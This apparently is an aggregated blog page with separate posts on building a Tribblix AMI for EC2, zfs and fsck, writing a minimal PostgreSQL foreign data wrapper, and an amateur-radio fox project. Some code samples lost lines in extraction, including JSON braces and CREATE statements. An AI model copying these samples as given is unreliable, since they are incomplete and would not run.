You need to use the minimal ISO (I actually use a custom, even more minimal ISO, but that's just a convenience for myself). Just launch that as root:

zap create-zone -t bhyve -z bhyve1 \
-x  \
-I /var/tmp/tribblix-0m29-minimal.iso \
-V 8G

Note that this creates an 8G zvol, which is the starting size of the AMI.

Then run socat as root to give you a VNC socket to talk to

socat TCP-LISTEN:5905,reuseaddr,fork UNIX-CONNECT:/export/zones/bhyve1/root/tmp/vm.vnc

and as yourself, run the vnc viewer

vncviewer :5

Once it's finished booting, log in as root and install with the ec2-baseline overlay which is what makes sure it's got the pieces necessary to work on EC2.

./live_install.sh -G c1t0d0 ec2-baseline

Back as root on the host, ^C to get out of socat, remove the ISO image and reboot, so it will boot from the newly installed image.

zap remove-cd -z bhyve1 -r

Restart socat and vncviewer, and log in to the guest again.

What I then do is to remove any configuration or other data from the guest that we don't want in the final system. (This is similar to the old sys-unconfig that many of us used to Solaris will be familiar with.)

zap unconfigure -a

I usually also ensure that a functional resolv.conf exists, just in case dhcp doesn't create it correctly.

echo "nameserver" > /etc/resolv.conf

Back on the host, shut the instance down by shutting down the bhyve zoned it's running in:

zoneadm -z bhyve1 halt

Now the zfs volume you created contains a suitable image. All you have to do is get it to AWS. First copy the image into a plain file:

dd if=/dev/zvol/rdsk/rpool/bhyve1_bhvol0 of=/var/tmp/tribblix-m29.img bs=1048576

At this point you don't need the zone any more so you can get rid of it:

zap destroy-zone -z bhyve1

The raw image isn't in a form you can use, and needs converting. There's a useful tool - the VMDK stream converter (there's also a download here) - just untar it and run it on the image:

python2 ./VMDK-stream-converter-0.2/VMDKstream.py /var/tmp/tribblix-m29.img /var/tmp/tribblix-m29.vmdk

Now copy that vmdk file (and it's also a lot smaller than the raw img file) up to S3, in the following you need to adjust the bucket name from mybucket to something of yours:

aws s3 cp --cli-connect-timeout 0 --cli-read-timeout 0 \
/var/tmp/tribblix-m29.vmdk s3://mybucket/tribblix-m29.vmdk

Now you can import that image into a snapshot:

aws ec2 import-snapshot --description "Tribblix m29" \
--disk-container file://m29-import.json

where the file m29-import.json looks like this:

    "Description": "Tribblix m29 VMDK",
    "Format": "vmdk",
    "UserBucket": {
        "S3Bucket": "mybucket",
        "S3Key": "tribblix-m29.vmdk"

The command will give you a snapshot id, that looks like import-snap-081c7e42756d7456b, which you can follow the progress of with

aws ec2 describe-import-snapshot-tasks --import-task-ids import-snap-081c7e42756d7456b

When that's finished it will give you the snapshot id itself, such as snap-0e0a87acc60de5394. From that you can register an AMI, with

aws ec2 register-image --cli-input-json file://m29-ami.json

where the m29-ami.json file looks like:

    "Architecture": "x86_64",
    "Description": "Tribblix, the retro illumos distribution, version m29",
    "EnaSupport": false,
    "Name": "Tribblix-m29",
    "RootDeviceName": "/dev/xvda",
    "BlockDeviceMappings": [
            "DeviceName": "/dev/xvda",
            "Ebs": {
                "SnapshotId": "snap-0e0a87acc60de5394"
    "VirtualizationType": "hvm",
    "BootMode": "legacy-bios"

If you want to create a Nitro-enabled AMI, change "EnaSupport" from "false" to "true", and "BootMode" from "legacy-bios" to "uefi".

What, no fsck? The Trouble with Tribbles...

There was a huge amount of resistance early on to the fact that zfs didn't have an fsck. Or, rather, a separate fsck.

I recall being in Sun presentations introducing zfs and question after question was about how to repair zfs when it got corrupted.

People were so used to shoddy file systems that were so badly implemented that a separate utility was needed to repair file system errors caused by fundamental design and implementation errors in the file system itself that the idea that the file system driver itself ought to take responsibility for managing the state of the file system was totally alien.

If you think about ufs, for example, there were a number of known failure modes, and what you did was take the file system offline, run the checker against it, and it would detect the known errors and modify the bits on disk in a way that would hopefully correct the problem. (In reality, if you needed it, there was a decent chance it wouldn't work.) Doing it this way was simple laziness - it would be far better to just fix ufs so it wouldn't corrupt the data in the first place (ufs logging went a long way towards this, eventually). And you were only really protecting against known errors, where you understood exactly the sequence of events that would cause the file system to end up in a corrupted state, so that random corruption was either undetectable or unfixable, or both.

The way zfs thought about this was very different. To start with, eliminate all known behaviour that can cause corruption. The underlying copy on write design goes a long way, and updates are transactional so either complete or not. If you find a new failure mode, fix that in the file system proper. And then, correction is built in rather than separate, which means that it doesn't need manual intervention by an administrator, and all repairs can be done without taking the system offline.

Thankfully we've moved on, and I haven't heard this particular criticism of zfs for a while.

Creating a simple foreign data wrapper for PostgreSQL alp's notes

Today I'd like to describe how to create own minimal usable foreign data wrapper (FDW) for PostgreSQL.

Common information about FDW interfaces

I suppose you know C and have basic PostgreSQL DBA experience. Foreign data wrapper (FDW) is a mean of accesssing another data sources from PostgreSQL DBMS. In this article I'll walk you through writing minimal usable FDW (mufdw). Going through mufdw code, I'll show you how you can use PostgreSQL FDW API (its description you can find in the official documentation).

To access another data source you define FDW by specifying its name, validator function and handler function like this

  HANDLER mufdw_handler
  VALIDATOR mufdw_validator;
Both handler and validator are SQL functions. A validator is called when user mapping, foreign server or foreign table is created or modified to check if option is valid for the object. A handler just returns a struct, containing methods defining FDW (FdwRoutine). Most FDW will do foreign data wrapper creation behind the scenes when you create extension, so for administrator this could look like

Next you should define a foreign server, which basically specifies a remote server host in one or another way. For example, you can define host name, port and database name in foreign server options. Our sample mufdw allows to query another table in the same database. So server definition doesn't define any options and you can create server simply by

Now we have to define user mapping - how local user should access remote data source. Usually user mapping definition includes authentication information - like remote user name and password. As our minimal usable fdw will just wrap local tables and use the same user for scanning them (via SPI interface), our user mapping will be formal:

Let's create a plain table which will be used as a source for our foreign table.

CREATE TABLE players(id int primary key, nick text, score int);
INSERT INTO players SELECT i, 'nick_'||i, i*10 from generate_series(1,10) i;
Foreign table is actually an object which behaves mostly like normal table, but provides access to remote data. In foreign table definition we provide options, necessary to identify this data. In our case it's local table and schema name.

CREATE FOREIGN TABLE f_players (id int, nick text, score int) server loopback options (table_name 'players', schema_name 'public');
Now we can query data from our foreign table.

SELECT * FROM players ;
 id |  nick   | score 
  1 | nick_1  |    10
  2 | nick_2  |    20
  3 | nick_3  |    30
  4 | nick_4  |    40
  5 | nick_5  |    50
  6 | nick_6  |    60
  7 | nick_7  |    70
  8 | nick_8  |    80
  9 | nick_9  |    90
 10 | nick_10 |   100
(10 rows)

What happens when you query a foreign table? PostgreSQL planner firstly looks if a table used in query is a foreign table and looks for its foreign server FdwRoutine. Pointer to FdwRoutine is recorded in RelOptInfo structure, which is used in planner to represent relation. This work is done in get_relation_info() function. Firstly planner access our fdw methods when looks for relation size in set_rel_size() (which is called for each base relation in the begining of planning (make_one_rel()). set_foreign_size() calls GetForeignRelSize() to find out relation size after applying restriction clauses. When planner generate possible paths to access a base relation in set_rel_pathlist(), it calls GetForeignPaths() function from RelOptInfo->fdwroutine to generate foreign path. Access paths are used by planner to find out possible strategy to access relation. Usually for foreign tables there will be no another paths besides foreign path. For join relation there could be several paths - foreign join path and several local join paths (for example, using nestloop or hash join method). If foreign path is the best access path for a particular relation, GetForeignPlan() function from its fdwroutine will be called to generate ForeignScan plan in create_foreignscan_plan(). Executor executes ForeignScan plan. When it initializes foreign scan state, BeginForeignScan() is called. Later tuples are fetched as needed by executor in IterateForeignScan(). If it's necessary to restart foreign scan from begining, ReScanForeignScan() is called. When relation scan is ended, EndForeignScan() is called.

Mufdw implementation

Let's look at how the minimal set of functions needed by read-only FDW is implemented in mufdw.

The basic logic behind mufdw is simple. For each foreign table we provide table name and table schema as foreign table options. When user queries remote table we open SPI cursor and fetch data from local table, identified by these schema and name. Query text is saved in foreign scan private field during planning. In BeginForeignScan() we create cursor for later use. IterateForeignScan() fetches one tuple from it and saves in executor state node scan slot. Here node is a basic "class"-like hierarchical structures used in PostgreSQL source code.

GetForeignRelSize() function

void GetForeignRelSize(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid)

This methods obtains relation size estimates for a foreign table. Here root is the planner information about the query, baserel - information about the table and foreigntableid is the Oid of the foreign table. In this function we have to fill in baserel->tuples and baserel->rows. baserel->fdw_private can be initialized and used for private fdw purposes.

In mufdw it is implemented as mufdwGetForeignRelSize(). mufdwGetForeignRelSize() basically allocates memory for relation fdw_private structure, searches in foreign table options for "table_schema" and "table_name" and saves them for further use. It also makes minimal effort to estimate relation size, but in fact it gives default estimations, as we don't gather any statistic for mufdw foreign table.

GetForeignPaths() function

void GetForeignPaths(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid)

This function should create foreign path and add it to baserel->pathlist. It's recommended to use create_foreignscan_path to build the ForeignPath. Arguments are the same.

In mufdw it is implemented as mufdwGetForeignPaths(). It creates basic foreign scan path and adds it to the relation path list. Cost is estimated as a sequential scan. These estimates are not accurate in any way.

GetForeignPlan() function

ForeignScan *GetForeignPlan(PlannerInfo *root, RelOptInfo *baserel, Oid foreigntableid, ForeignPath *best_path, List *tlist, List *scan_clauses, Plan *outer_plan)

This function is called in the end of query planning and should create a ForeignScan plan node. It is passed foreign path, generated by GetForeignPaths(), GetForeignJoinPaths() or GetForeignUpperPaths(). We also get the target list, which should be emitted by plan node, restriction clauses to be enforced and outer subplan of the ForeignScan.

In mufdw it is implemented as mufdwGetForeignPlan(). We put all scan clauses in the plan node qual list for recheck as mufdw doesn't perform "remote" filtering. Function gets scan clauses as list of RestrinctInfo nodes, but should use expression list for plan quals. extract_actual_clauses() is used to perform this transformation. Also we construct simple "SELECT *" query to extract data from plain table. fdw_private foreignscan field should be a list of nodes, so that copyObject() could copy them. So we wrap our C string, representing query, into String node and create fdw_private as single-member list.

BeginForeignScan() function

void BeginForeignScan(ForeignScanState *node, int eflags)

This function is called to begin foreign scan execution. It can, for example, establish connection to DBMS. Note that function will also be called when running explain for a query (in that case (eflags & EXEC_FLAG_EXPLAIN_ONLY) is true). When called from explain, function should avoid doing any externally visible actions.

In mufdw it is implemented as mufdwBeginForeignScan(). Here we create cursor for the query, constructed during plan creation and initialize internal scan state with its name. Our local open_new_cursor() function opens cursor for query using SPI and returns name of corresponding portal. The issue here is that SPI context is transient, we can't use memory, allocated in this context, in other parts of program, so should copy it to our old context.

IterateForeignScan function

TupleTableSlot *IterateForeignScan(ForeignScanState *node)

This function is used to fetch one tuple and return it in ForeignScanState's tuple slot.

In mufdw it is implemented as mufdwIterateForeignScan(). Firstly we clear tuple slot, search for our SPI cursor and fetch one tuple from it. If there's no data, it will be enough. If there is some data, we deform SPI tuple to slot's array of values and nulls and call ExecStoreVirtualTuple() to store it. The only issue is that it should be materialized, as SPI tuple will be released when SPI context is destroyed.

ReScanForeignScan function

void ReScanForeignScan(ForeignScanState *node)

This function is used to restart scan from the begining.

In mufdw it is implemented as mufdwReScanForeignScan(). It just closes old cursor and opens new one for our query, stored in foreign scan internal state.

EndForeignScan function

void EndForeignScan(ForeignScanState *node)

This function should just end scan and release resources.

In mufdw it is an empty function. We don't explicitly release resources as they will be released when transaction ends.

fdw_handler function

fdw_handler is just a SQL function which should return pointer to FdwRoutine structure, which contains references to FDW functions, which we've just described.

In mufdw it's implemeted as mufdw_handler(). Only functions, necessary for qeurying foreign tables, are implemented.

fdw_validator function

fdw_validator checks options, used during CREATE or ALTER statements for foreign data wrapeprs, foreign servers, user mappings and foreign tables. It gets list of options as an array of text as the first argument and OID representing the type of object the options are associated with. OID can be ForeignDataWrapperRelationId, ForeignServerRelationId, UserMappingRelationId, or ForeignTableRelationId.

In mufdw it's implemented as mufdw_validator. It allows only "table_name" and "schema_name" options for foreign tables and doesn't check options for other objects.

SQL code

We need a bit of SQL code to glue this all together. We should create sql-level functions for validator and handler and create foreign data wrapper. For mufdw it's done in its extension script.


We looked at how you can create a simple read-only foreign data wrapper in C, analyzing mufdw sample foreign data wrapper. I hope, this was useful, or at least interesting.

The jeffpc Amateur Radio Fox Josef "Jeff" Sipek

There is already a number of different fox hunting designs out there—both commercial and hobbyist built. Therefore there is no practical reason to make another design, but educational and entertainment reasons are valid as well.

So I made one.

I put together a project page which talks about the project a little bit but mostly serves to point at the source, binary files, schematic, and a manual. Since it doesn’t make sense for me to repeat myself, just go over to the project page and read more about it there ;)

Finally, this is what the finished circuit looks like:

As always, comments, suggestions, and other feedback is welcome.